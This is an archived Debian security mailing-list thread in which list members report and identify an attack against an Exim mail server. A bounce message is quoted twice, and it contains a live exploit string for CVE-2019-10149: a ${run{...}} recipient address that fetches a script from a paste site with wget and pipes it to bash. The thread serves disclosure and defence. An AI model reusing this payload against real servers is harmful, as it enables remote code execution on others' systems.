1. Forum
  2. Usenet
  3. LINUX.DEBIAN.SECURITY

  • Misuse/Abuse

    From Paul Wise@21:1/5 to All on Tue Oct 13 15:00:02 2020
    On Tue, Oct 13, 2020 at 7:14 AM Knieling, Christian (IANM) wrote:

    I don't know if this messages reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

    I forwarded this to the paste.d.n admin and they removed them.

    For future reference, the admin contact is listed on the left side of the site:

    https://paste.debian.net/

    --
    bye,
    pabs

    https://wiki.debian.org/PaulWise

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Daniel Leidert@21:1/5 to All on Tue Oct 13 16:20:02 2020
    Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
    To whom this may concern,

    I got a system message from my mailer daemon lately. It contains

    -------------------------------- cut --------------------------------
    Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
    The sender is <>.

    The following address(es) have yet to be delivered:

    ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t- \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas h\x22}}@ianm-mang.math.kit.edu:
    Too many "Received" headers - suspected mail loop -------------------------------- cut --------------------------------
    [..]
    I don't know if this messages reaches the right persons, but someone may forward it. You may at least remove the files which are accessible on paste.debian.net.

    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Regards, Daniel
    --
    Regards,
    Daniel Leidert <[email protected]> | https://www.wgdd.de/
    GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D
    GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78

    If you like my work consider sponsoring me via https://www.patreon.com/join/dleidert

    -----BEGIN PGP SIGNATURE-----

    iQIzBAABCgAdFiEEvu1N7VVEpMA+KD3HS80FZ8KW0F0FAl+FsvsACgkQS80FZ8KW 0F3qYA/+NkdKL/0bGPFLAd+r+eimn4ChqZRWedWDSwjrhGRsCkmRWtrrYEEU8fUr YxQCqSU7nIXsApP8wWszlGzQZyw1/O2IhEgZmRHf2nbd+qe1u0yIJtNw8+87vdeP NgAqLcpOLJG1tB8cBGWhYsb/1tVeGLnGpOzWUvLSZtDRB1boe899OVID+vbMMgY0 m19Asoz7paGaaHjxqC6RXJ9Y/V+LrVqqx1jBnvKbiJJEndyg8BimOggYXfm8koE6 qHpV1ttQPDxeDyVrDT/qhbb4lf501V2Qtw7dpBFHRxn3UJyZiD7HABGiwd9IWhKF JqEJT8+gtWiDOcXWOhMnzbggySVzEnVXgDmrtAKLrcAfSx8He/hpHgTsoQmZlZ77 8IX2XWhDmPm8J4QWe1JM5vkgDiyDqm93BRvNXTdZBCZOdYaGQm3PzGzrsbJfZeDB 8a36QvlcYQBnFw1h6fOXaQvXQbykpr8WfjeAy4L5XX44NiIdCQVDMdbC8p+8wdif yw3FNrI2yYQ3VfdiwTbdmsikVekoV09RYbR9r7jHCvKNz7hX4cenaW6/NHIIp/PO Y+Y5/wWImS7KPoCIHnH2AtXDbkGHgdug43OCV2dJuaIE
  • From Sven Hartge@21:1/5 to Daniel Leidert on Tue Oct 13 16:30:02 2020
    On 13.10.20 16:00, Daniel Leidert wrote:

    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Probably CVE-2019-10149

    https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

    Grüße,
    Sven.

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Martin Holub@21:1/5 to All on Tue Oct 13 16:40:02 2020
    Am 13.10.20 um 16:00 schrieb Daniel Leidert:

    Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
    To whom this may concern,

    I got a system message from my mailer daemon lately. It contains

    -------------------------------- cut --------------------------------
    Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
    The sender is <>.

    The following address(es) have yet to be delivered:

    ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
    \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
    h\x22}}@ianm-mang.math.kit.edu:
    Too many "Received" headers - suspected mail loop
    -------------------------------- cut --------------------------------
    [..]
    I don't know if this messages reaches the right persons, but someone may
    forward it. You may at least remove the files which are accessible on
    paste.debian.net.
    Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here?

    Regards, Daniel

    Hi,

    I think some Exim4 exploit, see CVE-2019-10149 [1].

    Cheers,
    Martin

    [1] https://security-tracker.debian.org/tracker/CVE-2019-10149

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)